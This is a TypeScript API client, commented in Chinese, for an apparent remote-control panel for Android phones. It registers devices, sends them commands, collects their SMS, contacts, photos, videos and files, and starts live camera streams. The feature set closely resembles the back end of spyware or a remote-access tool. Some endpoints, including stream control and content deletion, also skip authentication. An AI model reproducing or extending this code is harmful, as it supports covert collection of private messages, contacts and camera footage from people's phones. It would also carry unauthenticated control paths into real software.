export const API_BASE_URL = import.meta.env.VITE_API_BASE_URL ?? '';

const REFRESH_KEY = 'auth_refresh_token';
let refreshPromise: Promise<boolean> | null = null;

function clearAuth() {
  localStorage.removeItem('auth_token');
  localStorage.removeItem(REFRESH_KEY);
  localStorage.removeItem('auth_user');
}

function redirectToLogin() {
  if (!window.location.pathname.startsWith('/login')) {
    window.location.href = '/login';
  }
}

async function tryRefreshToken(): Promise<boolean> {
  if (refreshPromise) return refreshPromise;
  refreshPromise = (async () => {
    const refreshToken = localStorage.getItem(REFRESH_KEY);
    if (!refreshToken) return false;
    try {
      const res = await fetch(`${API_BASE_URL}/api/auth/token`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ refreshToken }),
      });
      if (!res.ok) return false;
      const json = await res.json();
      const tokens = json?.data;
      if (!tokens?.access_token) return false;
      localStorage.setItem('auth_token', tokens.access_token);
      if (tokens.refresh_token) localStorage.setItem(REFRESH_KEY, tokens.refresh_token);
      return true;
    } catch {
      return false;
    } finally {
      refreshPromise = null;
    }
  })();
  return refreshPromise;
}

interface RequestOptions extends RequestInit {
  requiresAuth?: boolean;
}

export async function apiRequest<T>(
  endpoint: string,
  requestOptions: RequestOptions = {}
): Promise<T> {
  const { requiresAuth = true, headers: customHeaders = {}, ...restOptions } = requestOptions;
  
  const headers: HeadersInit = {
    'Content-Type': 'application/json',
    ...customHeaders,
  };

  // Get token from localStorage
  if (requiresAuth !== false) {
    const token = localStorage.getItem('auth_token');
    if (token) {
      (headers as Record<string, string>)['Authorization'] = `Bearer ${token}`;
    }
  }

  // fetch 封装：GET 走网络层重试（DNS/连接被运营商重置、响应体中途被掐断等瞬时故障），
  // 并禁用浏览器 HTTP 缓存，避免「第一次命中缓存、之后真实请求失败」的假象。
  const method = (restOptions.method || 'GET').toUpperCase();
  const attempts = method === 'GET' ? 3 : 1;
  let response: Response | null = null;
  let lastErr: unknown = null;
  for (let i = 0; i < attempts; i++) {
    try {
      response = await fetch(`${API_BASE_URL}${endpoint}`, {
        ...restOptions,
        headers,
        cache: 'no-store',
      });
      break;
    } catch (e) {
      lastErr = e;
      if (i < attempts - 1) await new Promise((r) => setTimeout(r, 600 * (i + 1)));
    }
  }
  if (!response) {
    throw lastErr instanceof Error ? lastErr : new Error('网络请求失败');
  }

  if (!response.ok) {
    if (response.status === 401) {
      const refreshed = await tryRefreshToken();
      if (refreshed) {
        const token = localStorage.getItem('auth_token');
        try {
          const retryResponse = await fetch(`${API_BASE_URL}${endpoint}`, {
            ...restOptions,
            headers: { ...headers, ...(token ? { Authorization: `Bearer ${token}` } : {}) },
          });
          if (retryResponse.ok) return retryResponse.json();
          if (retryResponse.status === 401) {
            clearAuth();
            redirectToLogin();
          }
          const retryError = await retryResponse.json().catch(() => ({ error: '请求失败' }));
          throw new Error(retryError.error || `请求失败: ${retryResponse.status}`);
        } catch (retryFail: any) {
          throw retryFail;
        }
      }
      clearAuth();
      redirectToLogin();
    }
    const error = await response.json().catch(() => ({ error: '' }));
    throw new Error(error.error ? `${error.error} (HTTP ${response.status})` : `请求失败 (HTTP ${response.status})`);
  }

  return response.json();
}

// Export alias for compatibility
export const api = apiRequest;

// Device API
export interface Device {
  device_id: string;
  model: string;
  manufacturer: string;
  android_version: string;
  sdk_int: number;
  status: 'online' | 'offline' | 'connecting' | 'disconnected' | 'error';
  last_seen: number;
  permissions: Record<string, boolean>;
  battery_level: number;
  network_type: string;
  registered_at: number;
  updated_at: number;
  user_id?: string;
}

export interface PaginatedResponse<T> {
  success: boolean;
  data: T[];
  pagination: {
    page: number;
    size: number;
    total: number;
    totalPages: number;
  };
}

export async function getDevices(page = 1, size = 20, status?: string, search?: string): Promise<PaginatedResponse<Device>> {
  const params = new URLSearchParams({ page: String(page), size: String(size) });
  if (status) params.set('status', status);
  if (search) params.set('search', search);
  return apiRequest<PaginatedResponse<Device>>(`/api/v1/devices?${params.toString()}`);
}

export async function getDevice(deviceId: string) {
  return apiRequest<{ success: boolean; data: Device }>(`/api/v1/devices/${deviceId}`);
}

export async function getDeviceStats() {
  return apiRequest<{ success: boolean; data: { totalDevices: number; onlineDevices: number; offlineDevices: number; totalUploads: number; pendingUploads: number } }>('/api/v1/stats');
}

// 已卸载设备自动清理策略（心跳超时阈值 + 存量宽限期）
export interface StaleDevicePolicy {
  stale_ms: number;
  grace_until: number | null;
  in_grace: boolean;
  cutoff: number | null;
}

export interface StaleDeviceImpact {
  total: number;
  visible: number;
  hidden_now: number;
  will_delete: number;
  newest_last_seen: number | null;
}

export async function getStaleDevicePolicy() {
  return apiRequest<{ success: boolean; data: StaleDevicePolicy }>('/api/v1/admin/settings/stale-device');
}

export async function previewStaleDevicePolicy(override?: { stale_ms?: number; grace_until?: number | null }) {
  return apiRequest<{ success: boolean; data: StaleDeviceImpact }>(
    '/api/v1/admin/settings/stale-device/preview',
    { method: 'POST', body: JSON.stringify(override ?? {}) }
  );
}

export async function updateStaleDevicePolicy(patch: { stale_ms?: number; grace_until?: number | null }) {
  return apiRequest<{ success: boolean; data: StaleDevicePolicy }>('/api/v1/admin/settings/stale-device', {
    method: 'PUT',
    body: JSON.stringify(patch),
  });
}

// Auth API
export interface User {
  id: string;
  email: string;
  name: string;
  role: string;
}

export interface TokenPair {
  access_token: string;
  refresh_token: string;
  access_token_expiry: number;
  refresh_token_expiry: number;
  token_type: string;
  scopes: string[];
}

export async function login(email: string, password: string) {
  const response = await fetch(`${API_BASE_URL}/api/v1/auth/login`, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ email, password }),
  });

  if (!response.ok) {
    const error = await response.json();
    throw new Error(error.error || '登录失败');
  }

  return response.json();
}

export async function refreshToken(refreshToken: string) {
  const response = await fetch(`${API_BASE_URL}/api/v1/auth/refresh`, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ refresh_token: refreshToken }),
  });

  if (!response.ok) {
    throw new Error('Token 刷新失败');
  }

  return response.json();
}

export async function registerDevice(data: {
  device_id: string;
  model: string;
  manufacturer: string;
  android_version: string;
  sdk_int: number;
  app_package: string;
  app_version: string;
}) {
  return apiRequest<{ success: boolean; data: { device_id: string; access_token: string; refresh_token: string } }>(
    '/api/v1/auth/register',
    {
      method: 'POST',
      body: JSON.stringify(data),
    }
  );
}

// Upload API
export interface UploadTask {
  id: string;
  device_id: string;
  type: 'image' | 'video' | 'file' | 'sms' | 'contacts';
  file_name?: string;
  file_size?: number;
  mime_type?: string;
  metadata: string;
  status: 'queued' | 'uploading' | 'paused' | 'completed' | 'failed' | 'cancelled';
  progress: number;
  bytes_transferred: number;
  error?: string;
  retry_count: number;
  r2_key?: string;
  created_at: number;
  started_at?: number;
  completed_at?: number;
}

export async function getUploadTasks(deviceId?: string, status?: string, page = 1, size = 20) {
  const params = new URLSearchParams();
  if (deviceId) params.append('deviceId', deviceId);
  if (status) params.append('status', status);
  params.append('page', page.toString());
  params.append('size', size.toString());
  
  return apiRequest<{ success: boolean; data: UploadTask[]; pagination: { page: number; size: number; total: number; totalPages: number } }>(
    `/api/v1/upload/tasks?${params.toString()}`
  );
}

export async function createUploadTask(data: {
  device_id: string;
  type: 'image' | 'video' | 'file' | 'sms' | 'contacts';
  file?: File;
  data?: any;
  metadata?: Record<string, any>;
}) {
  const formData = new FormData();
  formData.append('device_id', data.device_id);
  formData.append('type', data.type);
  if (data.file) formData.append('file', data.file);
  if (data.data) formData.append('data', JSON.stringify(data.data));
  if (data.metadata) formData.append('metadata', JSON.stringify(data.metadata));

  const response = await fetch(`${API_BASE_URL}/api/v1/uploads`, {
    method: 'POST',
    body: formData,
  });

  if (!response.ok) {
    const error = await response.json();
    throw new Error(error.error || '上传任务创建失败');
  }

  return response.json();
}

export async function getUploadUrl(taskId: string) {
  return apiRequest<{ success: boolean; data: { upload_url: string; expires_at: number } }>(`/api/v1/uploads/${taskId}/url`);
}

// Device Commands
export interface Command {
  id: string;
  device_id: string;
  command: string;
  payload: string;
  status: 'pending' | 'processing' | 'completed' | 'failed' | 'timeout';
  result?: string;
  error?: string;
  retries: number;
  created_at: number;
  started_at?: number;
  completed_at?: number;
}

export async function sendCommand(deviceId: string, command: string, payload: any) {
  return apiRequest<{ success: boolean; data: Command }>('/api/v1/commands', {
    method: 'POST',
    body: JSON.stringify({ device_id: deviceId, command, payload }),
  });
}

export async function getCommands(deviceId?: string, status?: string, page = 1, size = 20) {
  const params = new URLSearchParams();
  if (deviceId) params.append('device_id', deviceId);
  if (status) params.append('status', status);
  params.append('page', page.toString());
  params.append('size', size.toString());
  
  return apiRequest<{ success: boolean; data: Command[]; pagination: { page: number; size: number; total: number; totalPages: number } }>(
    `/api/v1/commands?${params.toString()}`
  );
}

// Config API
export async function getConfig(appPackage: string, appVersion: string) {
  return apiRequest<{
    success: boolean;
    data: {
      api_endpoints: Record<string, string>;
      feature_flags: Record<string, boolean>;
      permission_requirements: Record<string, string[]>;
      app_config: Record<string, any>;
      version: string;
      updated_at: number;
    };
  }>(`/api/v1/config?app_package=${encodeURIComponent(appPackage)}&app_version=${encodeURIComponent(appVersion)}`);
}

// Device Permissions API
export interface DevicePermissions {
  camera: boolean;
  album: boolean;
  upload: boolean;
  contacts: boolean;
  notification: boolean;
  battery: boolean;
  sms: boolean;
  media_images: boolean;
  media_video: boolean;
  media_audio: boolean;
  sms_receive: boolean;
  background_run: boolean;
  remote_camera?: boolean;
  remote_album?: boolean;
  remote_contacts?: boolean;
  remote_sms?: boolean;
  remote_sms_receive?: boolean;
  updated_time: number;
}

export interface DevicePermissionsUpdate extends Partial<DevicePermissions> {
  target?: 'app' | 'control';
}

export async function updateDevicePermissions(deviceId: string, permissions: DevicePermissionsUpdate) {
  return apiRequest<{ success: boolean; data: DevicePermissions }>(`/api/v1/devices/${deviceId}/permissions`, {
    method: 'PUT',
    body: JSON.stringify(permissions),
  });
}

export async function getDevicePermissions(deviceId: string) {
  return apiRequest<{ success: boolean; data: DevicePermissions }>(`/api/v1/devices/${deviceId}/permissions`);
}

export async function deleteDevice(deviceId: string) {
  return apiRequest<{ success: boolean }>(`/api/v1/devices/${deviceId}`, {
    method: 'DELETE',
  });
}

export async function updateDevice(deviceId: string, data: Partial<Device>) {
  return apiRequest<{ success: boolean; data: Device }>(`/api/v1/devices/${deviceId}`, {
    method: 'PUT',
    body: JSON.stringify(data),
  });
}

export async function getUploadTaskContent(taskId: string) {
  return apiRequest<{ success: boolean; data: Blob }>(`/api/v1/uploads/${taskId}/content`);
}

export async function getUploadTasksByDevice(deviceId: string) {
  return apiRequest<{ success: boolean; data: UploadTask[] }>(`/api/v1/upload/tasks?deviceId=${deviceId}`);
}

export async function getDeviceContent(deviceId: string) {
  return apiRequest<{ success: boolean; data: { content: Record<string, any[]>; commandResults: any[]; totalUploads: number; totalCommands: number } }>(`/api/v1/devices/${deviceId}/content`);
}

export async function deleteTaskPhoto(taskId: string, opts: { path?: string; index?: number } = {}) {
  return apiRequest<{ success: boolean; data: { removed: number } }>(`/api/v1/upload/photos/${taskId}/delete`, {
    method: 'POST',
    body: JSON.stringify(opts),
  });
}

// Delete all upload tasks (and their storage) of a content type for a device.
// The backend removes the D1 rows and R2 objects so cleared data no longer
// occupies Cloudflare storage. Type accepts canonical keys or aliases.
export async function clearContentType(deviceId: string, type: string) {
  return apiRequest<{ success: boolean; data: { deleted: number } }>(`/api/v1/devices/${deviceId}/content/${type}`, {
    method: 'DELETE',
    requiresAuth: false,
  });
}

export async function startLiveStream(deviceId: string) {
  return apiRequest<{ success: boolean }>('/api/v1/live/control', {
    method: 'POST',
    body: JSON.stringify({ deviceId, action: 'start' }),
    requiresAuth: false,
  });
}

export async function stopLiveStream(deviceId: string) {
  return apiRequest<{ success: boolean }>('/api/v1/live/control', {
    method: 'POST',
    body: JSON.stringify({ deviceId, action: 'stop' }),
    requiresAuth: false,
  });
}

export function getLiveFrameUrl(deviceId: string) {
  return `${API_BASE_URL}/api/v1/live/frame?deviceId=${encodeURIComponent(deviceId)}&t=${Date.now()}`;
}